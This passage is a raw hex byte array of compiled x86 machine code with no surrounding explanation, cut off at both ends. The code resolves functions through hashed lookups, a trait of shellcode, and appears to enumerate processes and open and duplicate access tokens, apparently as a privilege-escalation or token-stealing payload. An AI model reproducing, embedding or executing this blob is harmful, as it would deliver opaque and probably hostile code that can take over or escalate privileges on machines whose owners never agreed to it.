x85,0xBF,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x75,0x30,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x40,0x00,0x00,0x00,0x8B,0x45,0xD8,0x89,0x04,0x24,0xE8,0x5B,0xF8,0xFF,0xFF,0x89,0x45,0xEC,0x83,0x7D,0xEC,0x00,0x0F,0x84,0xA1,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0x0F,0xB7,0x40,0x06,0x0F,0xB7,0xC0,0x89,0xC2,0xC7,0x44,0x24,0x18,0x02,0x00,0x00,0x00,0x8B,0x45,0x10,0x89,0x44,0x24,0x14,0xC7,0x44,0x24,0x10,0x00,0x00,0x00,0x00,0x8D,0x45,0xC4,0x89,0x44,0x24,0x0C,0xC7,0x44,0x24,0x08,0xFF,0xFF,0xFF,0xFF,0x89,0x54,0x24,0x04,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x94,0x22,0x00,0x00,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x78,0x3B,0x8B,0x45,0xC4,0x89,0x04,0x24,0xE8,0xBC,0xE3,0xFF,0xFF,0x85,0xC0,0x74,0x0F,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0x8B,0x45,0xC4,0x89,0x45,0xF0,0xEB,0x33,0x8B,0x45,0xC4,0x89,0x04,0x24,0xE8,0xF7,0x20,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE4,0x01,0x8B,0x45,0xC0,0x8B,0x00,0x39,0x45,0xE4,0x0F,0x82,0xE1,0xFE,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xEC,0x00,0x74,0x1E,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xBE,0x20,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x45,0xE8,0x01,0x83,0x7D,0xF4,0x00,0x75,0x0E,0x8B,0x45,0xB8,0x8B,0x00,0x39,0x45,0xE8,0x0F,0x82,0x56,0xFE,0xFF,0xFF,0x83,0x7D,0xF4,0x00,0x75,0x23,0xC7,0x04,0x24,0x28,0xE6,0x48,0x65,0xE8,0x82,0xCA,0xFF,0xFF,0xC7,0x04,0x24,0x06,0xE5,0x48,0x65,0xE8,0x76,0xCA,0xFF,0xFF,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xC0,0x85,0xC0,0x74,0x4B,0x8B,0x45,0xC0,0x85,0xC0,0x74,0x44,0x8B,0x55,0xBC,0x8B,0x45,0xC0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x2E,0x5C,0x00,0x00,0x8B,0x5D,0xC0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x8B,0x45,0xB8,0x85,0xC0,0x74,0x4C,0x8B,0x45,0xB8,0x85,0xC0,0x74,0x45,0x8B,0x45,0xB8,0xC7,0x44,0x24,0x08,0x24,0x4E,0x00,0x00,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xDB,0x5B,0x00,0x00,0x8B,0x5D,0xB8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x83,0x7D,0xEC,0x00,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xB3,0x1F,0x00,0x00,0x83,0x7D,0xF4,0x00,0x74,0x05,0x8B,0x45,0xF0,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x58,0x83,0x7D,0x08,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xC4,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD8,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0xC7,0x45,0xD8,0x18,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0x89,0x45,0xE4,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x1C,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x18,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x14,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x10,0x04,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x44,0x24,0x0C,0x8D,0x45,0xD8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x10,0x8D,0x45,0xF0,0x89,0x04,0x24,0xE8,0x12,0x20,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xCE,0x1E,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x0F,0x84,0x06,0x01,0x00,0x00,0x83,0x7D,0x0C,0x00,0x0F,0x84,0xFC,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x52,0xE6,0x48,0x65,0xE8,0x96,0xE7,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xDB,0xFD,0x4F,0xE5,0x89,0x04,0x24,0xE8,0x05,0xE6,0xFF,0xFF,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x84,0xC6,0x00,0x00,0x00,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x0C,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x0C,0x89,0x04,0x24,0x8B,0x45,0xE4,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xE8,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x04,0x1E,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x83,0x7D,0xE8,0x00,0x75,0x74,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x52,0xE6,0x48,0x65,0xE8,0x08,0xE7,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xDE,0x92,0x8E,0x56,0x89,0x04,0x24,0xE8,0x77,0xE5,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x74,0x42,0x8B,0x45,0x0C,0x8B,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x55,0xDC,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0x89,0x04,0x24,0x8B,0x45,0xE0,0xFF,0xD0,0x83,0xEC,0x10,0x89,0x45,0xE8,0x83,0x7D,0xE8,0x00,0x75,0x15,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0x08,0x00,0x74,0x0B,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x6B,0x1D,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x16,0x8B,0x45,0x0C,0x8B,0x00,0x85,0xC0,0x74,0x0D,0x8B,0x45,0x0C,0x8B,0x00,0x89,0x04,0x24,0xE8,0x4F,0x1D,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x12,0x8B,0x45,0xDC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xDC,0x89,0x04,0x24,0xE8,0x37,0x1D,0x00,0x00,0x83,0x7D,0xF4,0x00,0x74,0x05,0x8B,0x45,0xDC,0xEB,0x05,0xB8,0x00,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x83,0x7D,0x08,0x00,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x71,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0x52,0xE6,0x48,0x65,0xE8,0x15,0xE6,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xD4,0x0B,0x8F,0x24,0x89,0x04,0x24,0xE8,0x84,0xE4,0xFF,0xFF,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x35,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xF4,0xFF,0xD0,0x83,0xEC,0x04,0x89,0x45,0xF0,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xAC,0x1C,0x00,0x00,0xC7,0x45,0x08,0x00,0x00,0x00,0x00,0x83,0x7D,0xF0,0x00,0x74,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x90,0x90,0x55,0x89,0xE5,0x83,0xEC,0x38,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x68,0xE6,0x48,0x65,0xC7,0x45,0xE8,0x8C,0xE6,0x48,0x65,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x02,0x00,0x00,0x00,0x8D,0x45,0xE4,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0xE8,0x7F,0x23,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x4E,0x8D,0x45,0xEC,0x89,0x44,0x24,0x0C,0x8B,0x45,0x14,0x89,0x44,0x24,0x08,0x8B,0x45,0x10,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x95,0x00,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x28,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0x3E,0x00,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x74,0x17,0x8B,0x55,0xEC,0x8B,0x45,0x0C,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x12,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x0B,0x8B,0x45,0xEC,0x89,0x04,0x24,0xE8,0xC4,0x1B,0x00,0x00,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0x08,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x05,0x00,0x00,0x00,0xC7,0x04,0x24,0xFE,0xFF,0xFF,0xFF,0xE8,0x09,0x1E,0x00,0x00,0x83,0xEC,0x10,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x79,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x53,0x81,0xEC,0xA4,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x10,0x00,0x00,0x8B,0x45,0xC8,0x89,0x45,0xE8,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x01,0x00,0x00,0xC0,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xA0,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0x88,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0x80,0x00,0x00,0x00,0x00,0xC7,0x45,0x84,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0xCC,0xE3,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0xA4,0x97,0x06,0x9A,0x89,0x04,0x24,0xE8,0x3B,0xE2,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x0F,0x84,0xB9,0x03,0x00,0x00,0x8D,0x45,0xD8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0x8B,0x45,0xE0,0xFF,0xD0,0x83,0xEC,0x08,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x75,0x05,0xE9,0xA0,0x03,0x00,0x00,0x8B,0x45,0xC8,0x89,0x45,0xE8,0x8B,0x5D,0xC8,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x08,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x4C,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x63,0x03,0x00,0x00,0x8B,0x45,0xC8,0x8D,0x55,0xC8,0x89,0x54,0x24,0x0C,0x89,0x44,0x24,0x08,0x8B,0x45,0xF0,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x05,0x00,0x00,0x00,0xE8,0x52,0x1B,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x79,0x66,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xE8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0xCC,0x55,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x81,0x7D,0xE4,0x23,0x00,0x00,0xC0,0x0F,0x84,0x49,0xFF,0xFF,0xFF,0x81,0x7D,0xE4,0x04,0x00,0x00,0xC0,0x0F,0x84,0x3C,0xFF,0xFF,0xFF,0xEB,0x01,0x90,0x83,0x7D,0xE4,0x00,0x0F,0x88,0xCB,0x02,0x00,0x00,0x8B,0x45,0xF0,0x89,0x45,0xEC,0xC7,0x45,0xA0,0x18,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0x88,0x18,0x00,0x00,0x00,0xC7,0x45,0x8C,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x00,0x00,0x00,0x00,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x0C,0x00,0x00,0x00,0xC7,0x45,0x80,0x02,0x00,0x00,0x00,0xC6,0x45,0x84,0x00,0xC6,0x45,0x85,0x00,0x8D,0x85,0x7C,0xFF,0xFF,0xFF,0x89,0x45,0x9C,0x8B,0x45,0xEC,0x8B,0x40,0x44,0x89,0x45,0xB8,0x8D,0x45,0xB8,0x89,0x44,0x24,0x0C,0x8D,0x45,0xA0,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x04,0x00,0x00,0x8D,0x45,0xD4,0x89,0x04,0x24,0xE8,0x85,0x18,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x88,0xD2,0x01,0x00,0x00,0x8B,0x45,0xD4,0x8D,0x55,0xD0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x0A,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0xE2,0x18,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x88,0x99,0x01,0x00,0x00,0x8B,0x45,0xD0,0x8D,0x55,0xCC,0x89,0x54,0x24,0x14,0xC7,0x44,0x24,0x10,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x55,0x88,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x02,0x89,0x04,0x24,0xE8,0xD5,0x1A,0x00,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x88,0x49,0x01,0x00,0x00,0x8B,0x45,0xCC,0x8D,0x55,0xC4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x59,0x05,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0x12,0x01,0x00,0x00,0x8B,0x45,0xCC,0x8D,0x55,0xC0,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0xF0,0x0A,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x0F,0x84,0xDC,0x00,0x00,0x00,0x8B,0x55,0xD8,0x8B,0x45,0xC4,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x95,0x08,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x6B,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x8B,0x45,0xCC,0x8D,0x95,0x78,0xFF,0xFF,0xFF,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x54,0x09,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x43,0x8B,0x85,0x78,0xFF,0xFF,0xFF,0x85,0xC0,0x74,0x39,0x8B,0x45,0xCC,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0x8B,0x55,0x10,0x89,0x54,0x24,0x08,0x8B,0x55,0x0C,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x0F,0x1F,0x00,0x00,0x89,0x45,0xDC,0x83,0x7D,0xDC,0x00,0x74,0x0F,0x8B,0x55,0xCC,0x8B,0x45,0x14,0x89,0x10,0xC7,0x45,0xF4,0x01,0x00,0x00,0x00,0x8B,0x45,0xC0,0x85,0xC0,0x74,0x4F,0x8B,0x45,0xC0,0x89,0x04,0x24,0xE8,0xDD,0x53,0x00,0x00,0x8D,0x14,0x00,0x8B,0x45,0xC0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x73,0x53,0x00,0x00,0x8B,0x5D,0xC0,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x89,0x5C,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x8B,0x45,0xC4,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x12,0x8B,0x45,0xCC,0x89,0x04,0x24,0xE8,0x34,0x17,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0x8B,0x45,0xD0,0x89,0x04,0x24,0xE8,0x22,0x17,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x89,0x04,0x24,0xE8,0x10,0x17,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0x83,0x7D,0xF4,0x00,0x75,0x16,0x8B,0x45,0xEC,0x8B,0x00,0x85,0xC0,0x74,0x10,0x8B,0x45,0xEC,0x8B,0x00,0x01,0x45,0xEC,0xE9,0xDB,0xFD,0xFF,0xFF,0x90,0xEB,0x01,0x90,0x83,0x7D,0xF4,0x00,0x75,0x23,0xC7,0x04,0x24,0xD4,0xE6,0x48,0x65,0xE8,0xD8,0xC0,0xFF,0xFF,0xC7,0x04,0x24,0x05,0xE7,0x48,0x65,0xE8,0xCC,0xC0,0xFF,0xFF,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xD8,0x85,0xC0,0x74,0x10,0x8B,0x45,0xD8,0x89,0x04,0x24,0xA1,0x64,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x04,0x83,0x7D,0xF0,0x00,0x74,0x4A,0x83,0x7D,0xF0,0x00,0x74,0x44,0x8B,0x45,0xC8,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x8B,0x45,0xF0,0x89,0x04,0x24,0xE8,0x6F,0x52,0x00,0x00,0xA1,0x44,0x61,0x49,0x65,0xFF,0xD0,0x8B,0x55,0xF0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x00,0x89,0x04,0x24,0xA1,0x50,0x61,0x49,0x65,0xFF,0xD0,0x83,0xEC,0x0C,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8B,0x5D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x01,0x00,0x00,0x00,0xC7,0x04,0x24,0xBA,0xE6,0x48,0x65,0xE8,0x4D,0xDF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x04,0x22,0x96,0xBC,0x93,0x89,0x04,0x24,0xE8,0xBC,0xDD,0xFF,0xFF,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x0B,0x8B,0x45,0xF0,0xFF,0xD0,0x89,0x45,0xF4,0x8B,0x45,0xF4,0xC9,0xC3,0x55,0x89,0xE5,0x81,0xEC,0x88,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x01,0x00,0x00,0xC0,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xC4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xB9,0x00,0x00,0x00,0x00,0xB8,0x18,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xA0,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8B,0x45,0x0C,0xC7,0x00,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x18,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xA0,0x18,0x00,0x00,0x00,0xC7,0x45,0xA4,0x00,0x00,0x00,0x00,0xC7,0x45,0xAC,0x00,0x00,0x00,0x00,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x0C,0x00,0x00,0x00,0xC7,0x45,0xBC,0x02,0x00,0x00,0x00,0xC6,0x45,0xC0,0x00,0xC6,0x45,0xC1,0x00,0x8D,0x45,0xB8,0x89,0x45,0xB4,0x8B,0x45,0x08,0x89,0x45,0xDC,0xC7,0x45,0x98,0x68,0xE6,0x48,0x65,0xC7,0x45,0x9C,0x8C,0xE6,0x48,0x65,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x02,0x00,0x00,0x00,0x8D,0x45,0x98,0x89,0x44,0x24,0x04,0xC7,0x04,0x24,0x00,0x00,0x00,0x00,0xE8,0xFB,0x1B,0x00,0x00,0x89,0x45,0xF4,0x83,0x7D,0xF4,0x00,0x0F,0x84,0xA5,0x00,0x00,0x00,0x8D,0x45,0xDC,0x89,0x44,0x24,0x0C,0x8D,0x45,0xC4,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x04,0x00,0x00,0x8D,0x45,0xEC,0x89,0x04,0x24,0xE8,0x25,0x14,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x7E,0x8B,0x45,0xEC,0x8D,0x55,0xE8,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x0A,0x00,0x00,0x00,0x89,0x04,0x24,0xE8,0x86,0x14,0x00,0x00,0x89,0x45,0xF0,0x83,0x7D,0xF0,0x00,0x78,0x5E,0x8B,0x45,0xE8,0x8D,0x55,0xE4,0x89,0x54,0x24,0x14,0xC7,0x44,0x24,0x10,0x02,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x00,0x00,0x00,0x00,0x8D,0x55,0xA0,0x89,0x54,0x24,0x08,0xC7,0x44,0x24,0x04,0x00,0x00,0x00,0x02,0x89,0x04,0x